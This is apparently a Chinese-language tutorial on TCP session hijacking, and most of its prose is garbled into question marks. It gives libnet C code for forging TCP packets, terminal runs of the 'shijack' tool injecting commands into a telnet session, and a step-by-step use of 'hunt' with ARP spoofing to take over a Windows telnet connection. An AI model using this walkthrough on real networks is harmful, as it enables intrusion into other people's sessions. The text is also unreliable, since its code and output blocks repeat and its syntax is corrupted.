????if (??fd = libnet_open_raw_sock(IPPROTO_RAW)?? == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_open_raw_sock failed\n??;
????
????libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
????libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
????
????if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_do_checksum failed\n??;
????libnet_write_ip(fd, packet, psize);
????libnet_close_raw_sock(fd);
????libnet_destroy_packet(&packet);
????}
????
??????
????
????/********************************************************************************/
??????????޸????ģ?ԭ???Dz???pcap??ץ????????ץ???ı??Ľ??н??룬?????????Ack flags?ģ??ͰѰ??е?SEQ??ACKȡ?ó???.
????
?????Գ?????е??Բ??ҵ?SEQ??ACK??
????
??????
????
????[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
????[root@chi chi]# ./get_seq_ack
????get_seq_ack.c
????./get_seq_ack <source_ip> <dest_ip>
????[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
????device = eth0
????Connection form 192.168.25.1 to 192.168.25.4
????wait for SEQ/ACK :
????Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
????source_port is 3486
????dest_port is 23
????[root@chi chi]#
???????????SEQ = 0x4eb9d6ca ACK = 0x83005cc,?????????????????????? ???ٵġ?IP??Tcp??.
????
??????
????
????======================================================================================
????
????????ȥ????Ҫ?Ƚ?????Ҫ???͵?IP???? ??????Ip protocol????????libnet??????ip?Ǻܼ򵥵ģ?
????
????
????
????Ip protocol :
????
????
????
???? 0 4 8 16 19 24 32
???? ------------------------------------------------------------------------
???? | VERS | HLEN | Service Type | Total Length |
???? ------------------------------------------------------------------------
???? | Identification | Flags | Fragment Offset |
???? ------------------------------------------------------------------------
???? | Source IP Address |
???? ------------------------------------------------------------------------
???? | Destination IP Address |
???? ------------------------------------------------------------------------
???? | IP Options | Padding |
???? ------------------------------------------------------------------------
???? | Data |
???? ------------------------------------------------------------------------
????
??????ip packet?Ľ????ҾͲ?д???? ̫?鷳???? ???Ҿ???libnet??????ip????tcp????????㲻???Ļ???sczд??libnet?Ľ??ܣ?????д?ĺ??????Ҫ???ġ?
????
??????
????
????/******************************************************************************/
????
????Written by spwny
????
??????
????
????void
????sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
????{
????u_char *packet;
????int fd, psize;
????
????psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
????libnet_init_packet(psize, &packet);
??????
????
????if (!packet)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_init_packet failed\n??;
????fd = libnet_open_raw_sock(IPPROTO_RAW);
????if (??fd = libnet_open_raw_sock(IPPROTO_RAW)?? == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_open_raw_sock failed\n??;
????
????libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
????libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
????
????if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_do_checksum failed\n??;
????libnet_write_ip(fd, packet, psize);
????libnet_close_raw_sock(fd);
????libnet_destroy_packet(&packet);
????}
????
??????
????
????/********************************************************************************/
??????????޸????ģ?ԭ???Dz???pcap??ץ????????ץ???ı??Ľ??н??룬?????????Ack flags?ģ??ͰѰ??е?SEQ??ACKȡ?ó???.
????
?????Գ?????е??Բ??ҵ?SEQ??ACK??
????
??????
????
????[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
????[root@chi chi]# ./get_seq_ack
????get_seq_ack.c
????./get_seq_ack <source_ip> <dest_ip>
????[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
????device = eth0
????Connection form 192.168.25.1 to 192.168.25.4
????wait for SEQ/ACK :
????Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
????source_port is 3486
????dest_port is 23
????[root@chi chi]#
???????????SEQ = 0x4eb9d6ca ACK = 0x83005cc,?????????????????????? ???ٵġ?IP??Tcp??.
????
??????
????
????======================================================================================
????
????????ȥ????Ҫ?Ƚ?????Ҫ???͵?IP???? ??????Ip protocol????????libnet??????ip?Ǻܼ򵥵ģ?
????
????
????
????Ip protocol :
????
????
????
???? 0 4 8 16 19 24 32
???? ------------------------------------------------------------------------
???? | VERS | HLEN | Service Type | Total Length |
???? ------------------------------------------------------------------------
???? | Identification | Flags | Fragment Offset |
???? ------------------------------------------------------------------------
???? | Source IP Address |
???? ------------------------------------------------------------------------
???? | Destination IP Address |
???? ------------------------------------------------------------------------
???? | IP Options | Padding |
???? ------------------------------------------------------------------------
???? | Data |
???? ------------------------------------------------------------------------
????
??????ip packet?Ľ????ҾͲ?д???? ̫?鷳???? ???Ҿ???libnet??????ip????tcp????????㲻???Ļ???sczд??libnet?Ľ??ܣ?????д?ĺ??????Ҫ???ġ?
????
??????
????
????/******************************************************************************/
????
????Written by spwny
????
??????
????
????void
????sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
????{
????u_char *packet;
????int fd, psize;
????
????psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
????libnet_init_packet(psize, &packet);
??????
????
????if (!packet)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_init_packet failed\n??;
????fd = libnet_open_raw_sock(IPPROTO_RAW);
????if (??fd = libnet_open_raw_sock(IPPROTO_RAW)?? == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_open_raw_sock failed\n??;
????
????libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
????libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
????
????if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
????libnet_error(LIBNET_ERR_FATAL, ??libnet_do_checksum failed\n??;
????libnet_write_ip(fd, packet, psize);
????libnet_close_raw_sock(fd);
????libnet_destroy_packet(&packet);
????}
????
??????
????
????/********************************************************************************/
????????spwnyд?Ĵ????һС???֣??ǽ?????ν???ip??tcp???? ?????ͳ?ȥ??????Ե??????????վ??????.
????
????http://www.securiteam.com/tools/5QP0P0K40M.html
????
???????Ҿ??????Ĵ??????????һ????.
????
??????
????
????[chi@chi chi]$ gcc `libnet-config --defines` -o shijack shijack.c `libnet-config --libs` -lpcap -lnet
????[chi@chi chi]$ ./shijack
????Usage: ./shijack <interface> <src ip> <src port> <dst ip> <dst port> [-r]
????<interface> The interface you are going to hijack on.
????<src ip> The source ip of the connection.
????<src port> The source port of the connection.
????<dst ip> The destination IP of the connection.
????<dst port> The destination port of the connection.
????[-r] Reset the connection rather than hijacking it.
????
????Coded by spwny, Inspiration by cyclozine (http://www.geocities.com/stasikous).
????[chi@chi chi]$ ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
????pcap_open_live: socket: Operation not permitted
????[chi@chi chi]$ su root
????Password:
????[root@chi chi]# ./shijack eth0 192.168.25.1 4345 192.168.25.4 23
????Waiting for SEQ/ACK to arrive from the srcip to the dstip.
????(To speed things up, try making some traffic between the two, /msg person asdf
????
????Got packet! SEQ = 0x2670dc37 ACK = 0x782c03bd
????Starting hijack session, Please use ^C to terminate.
????Anything you enter from now on is sent to the hijacked TCP connection.
????mkdir wokao
????Closing connection..
????Done, Exiting.
????
??????
????
?????????????ȥ192.168.25.4?????濴?Ļ??? ?ͻῴ?????һ??wokao???ļ?????.??????????????????????ɹ??????ΰ??? û?а취~???Ǿ?ֻ????????hunt???? ??ĺܺ??õģ??ɹ??ʺܴ?Ŷ???пմ???Լ???hunt?Ĵ??????? ???ǿ???ͷ???Ѱ?~~~

?? hunt?İ?װ??ʹ??
????
??????
????
????hunt ??һ?????Բ??뵽???ͨѶ?е?һ?????????ɼ??Ӳ?????????̣߳?
????
????ftp://rpmfind.net/linux/rhcontrib/7.1/i386/hunt-1.5-4.i386.rpm
????
????Requires
????ld-linux.so.2
????
????libc.so.6
????
????libpthread.so.0
????
????/bin/sh
????
????Red Hat Linux release 7.3 (Valhalla)
????Kernel 2.4.18-3 on an i686
????login: chi
????Password:
????Last login: Sat Mar 22 11:46:22 from 192.168.25.1
????[chi@chi chi]$ su root
????Password:
????[root@chi chi]# rpm -ivh hunt-1.5-4.i386.rpm
????Preparing... ########################################### [100%]
????hunt ########################################### [100%]
????[root@chi chi]# /usr/sbin/hunt
????/*
????* hunt 1.5
????* multipurpose connection intruder / sniffer for Linux
????* (c) 1998-2000 by kra
????*/
????starting hunt
????--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
????l/w/r) list/watch/reset connections
????u) host up tests -- ???????
????a) arp/simple hijack (avoids ack storm if arp used) -- ʹ??arp spoof?????߽ٳ?
????s) simple hijack -- ?򵥵????߽ٳ?
????d) daemons rst/arp/sniff/mac
????o) options
????x) exit
????*>
???????????Щ??hunt?Ļ???ѡ??. ??ʹ??huntǰ??̽?????ߣ?֮??ſ??Բ???.
...................
????*> a
????0) 192.168.25.4 [49152] --> 192.168.25.1 [23]
????1) 192.168.25.1 [3920] --> 192.168.25.3 [23]
????
????choose conn> 0
????arp spoof src in dst y/n [y]> y src??192.168.25.1 dst ??192.168.25.4 ??Ҳ???ǰ?C??MAC?ı䲢????B
????src MAC [EA:1AE:AD:BE:01]> <========== MAC???????ж????
????arp spoof dst in src y/n [y]> y ??B??MAC?ı䲢????C
????dst MAC [EA:1AE:AD:BE:02]>
????input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
????dump connectin y/n [y]> y
????dump [s]rc/[d]st/[b]oth [b]> b
????print src/dst same characters y/n [n]> n
????
??????
????
????CTRL-C to break
????
???????ʱ?? ????Ѿ????뵽???telnet?????????ˣ?????????û?м??Խٳ֣????Զ?B??C??????û??Ӱ??ģ???ֻ?ǻῴ?????ߵĹ??̡???B??C????dir?????ʱ??.
????
????...........
????
??????
????
????C:\>dir
????<C7><FD><B6><AF><C6><F7> C <D6><D0><B5><C4><BE><ED><C3><BB><D3><D0><B1><EA><C7> <BE><ED><B5><C4><D0><F2><C1><D0><BA><C5><CA><C7> 4446-19EA
????
????C:\ <B5><C4><C4><BF><C2><BC>
????
????2002-09-30 19:07 <DIR> WINDOWS
????2000-06-08 17:00 2,164 PDOS.DEF
????2002-09-30 19:07 <DIR> Program Files
????2002-09-30 19:33 <DIR> My Documents
????2002-09-30 20:34 <DIR> Downloads
????2003-03-02 23:14 16,660 PkgClnup.log
????2003-03-22 16:58 22,092 jswx.log
????2002-10-01 18:12 <DIR> My Music
????2002-10-09 20:46 <DIR> TURBOC2
????2002-11-11 10:35 468 SCANDISK.LOG
????2002-12-16 18:11 <DIR> TC30
????2003-03-21 12:19 0 AILog.txt
????2003-03-06 22:47 13,030 PDOXUSRS.NET
????2002-10-25 01:03 209 boot.ini
????7 <B8><F6><CE><C4><BC><FE> 54,623 <D7><D6><BD><DA>
????CTRL-C to break7 <B8><F6><C4><BF><C2><BC> 1,652,977,664 <BF><C9><D3><C3><D7><D6C:\>><DA>
????
??????
????
?????????濴???ĺ???B???濴??????һ???ģ????????Dz????ܶ?C????????????????½ٳֹ?????̣߳?
CTRL-C to break
????
????-- press any key> you took over the connection
????ver
????
????Microsoft Windows 2000 [Version 5.00.2195]
????
????C:\>
????
??????
????
???????ʱ?????Ѿ???????????̣߳? ?????Լ?????????. ?????Ҿ??ò??????ǣ? ??Ϊ???????ʱ??B??freebsd5.0?ģ? ???????????߳̽ٳֺ? ??B?Ͼͻ??յ??????Ϣ??
????
??????
????
????$Mar 22 13:52:14 chi kernel : arp : 192.168.25.1 move form 00:01:02:e1:35:84 to ea:1a:de:ad:be:02
????
??????
????
?????? ?ο?????
????
????
????
????1. Simple Active Attack Against TCP pdf format
????
??????
????
????2. Ed Norris ??Analysis of a Telnet Session Hijack via Spoofed MAC Addresses and Session Resynchronization??
????
????URL: http://ouah.sysdoor.net/hiresync.htm
????
??????
????
????3. Kra (Krauz, Pavel). ??hunt.?? 1998.
????URL: http://www.tml.hut.fi/Opinnot/Tik-110.400/2000/sniffer/hunt.txt
????
??????
????
????4. Michal Zalewski ??Strange Attractors and TCP/IP Sequence Number Analysis??
????
????URL: http://ouah.sysdoor.net/strangeattract.htm
????
??????
????
????5. Simple active attack against TCP
????
????URL: http://ouah.sysdoor.net/tcp_attack.pdf10
????
???? ԭ??: Loose


?????б?
???ڼ??????ۡ???
????
???? ????
??  ?ƣ?
??֤?룺
??????????????????
??  ?ݣ?
 
 
  ????Ǣ̸??ѯ??
???????,????Ǣ̸   ???????,????Ǣ̸   ???????,????Ǣ̸
?˳?·??    ??ʽ   ???˺???  ?˲???Ƹ
 
??˾??ַ???ຣʡ?????????ش??73?ţ??????IJ???????????¥??     ??ICP??13000578??-1 ???????ر?????:63010402000123    
QQ:147399120    mail:lostlove000@163.com    ?绰: 13897410341    ?ʱࣺ810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    ??Ȩ???У????????Ƶ?????Ϣ???????޹?˾ δ??????????Ȩ??????????ת?أ?